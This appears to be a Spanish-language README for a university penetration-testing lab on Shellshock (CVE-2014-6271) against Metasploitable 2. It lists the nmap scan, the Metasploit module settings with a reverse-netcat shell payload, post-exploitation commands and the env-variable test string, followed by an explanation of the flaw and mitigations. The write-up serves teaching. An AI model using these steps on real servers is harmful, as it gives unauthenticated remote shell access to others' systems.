
Laboratorio educativo que demuestra la explotación de Shellshock (CVE-2014-6271) usando Metasploit contra Metasploitable 2, incluyendo escaneo, explotación, shell inversa y estrategias de mitigación.
Esta es la tarea práctica de Evaluación de Vulnerabilidades y Pruebas de Penetración – II, centrada en la explotación y análisis de la vulnerabilidad Shellshock (CVE-2014-6271).
Realizado en un entorno de laboratorio controlado usando Metasploitable 2 (objetivo) y Kali Linux (atacante).
nmap -sS -sV <target-ip>
msfconsole
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOST <target-ip>
set TARGETURI /cgi-bin/status
set LHOST <your-kali-ip>
set PAYLOAD cmd/unix/reverse_netcat
exploit
📸 La demostración incluye
📡 Resultados del escaneo Nmap
⚙️ Configuración de Metasploit
🔄 Salida de sesión de shell inversa
🛠 Comandos de post-explotación:
whoami
uname -a
ifconfig
Shellshock es una vulnerabilidad en el intérprete de comandos GNU Bash que permite a los atacantes ejecutar comandos arbitrarios inyectándolos en variables de entorno. Descubierta en septiembre de 2014 y asignada como CVE-2014-6271, afecta a Bash v1.14 a v4.3.
Bash procesa incorrectamente las definiciones de funciones en variables de entorno y ejecuta comandos adicionales después del cuerpo de la función. En servidores web que usan scripts CGI, las cabeceras HTTP se convierten en variables de entorno, creando un camino de ataque fácil.
Ejemplo:
env x='() { :;}; echo vulnerable' bash -c "echo test"
Si es vulnerable, imprime vulnerable.
Ejecución Remota de Código (RCE) completa sin autenticación
Explotable a través de simples peticiones HTTP
Usado en botnets, gusanos, ataques dirigidos
Afectó a millones de servidores, enrutadores y dispositivos IoT
Servidores de Yahoo – Malware a través de scripts CGI
Botnet Wopbot – Explotación automatizada
NAS QNAP – Acceso remoto a shell y malware
Gusanos autorreplicantes – Propagación a nuevos hosts vulnerables
🔄 Actualizar Bash inmediatamente
🚫 Deshabilitar scripts CGI no utilizados
🔥 Usar cortafuegos para bloquear tráfico innecesario
🛡 Implementar Cortafuegos de Aplicaciones Web (WAF)
📜 Monitorear registros de peticiones HTTP
👤 Aplicar principios de mínimo privilegio
Este proyecto es solo con fines educativos. Todas las pruebas se realizaron en un entorno de laboratorio controlado. ❌ NO utilice estas técnicas en sistemas sin permiso.
👨💻 Autor: Janith Madhusankha 🎓 Curso: BICT (Hons) en Redes y Seguridad 🏫 Institución: South Eastern University of Sri Lanka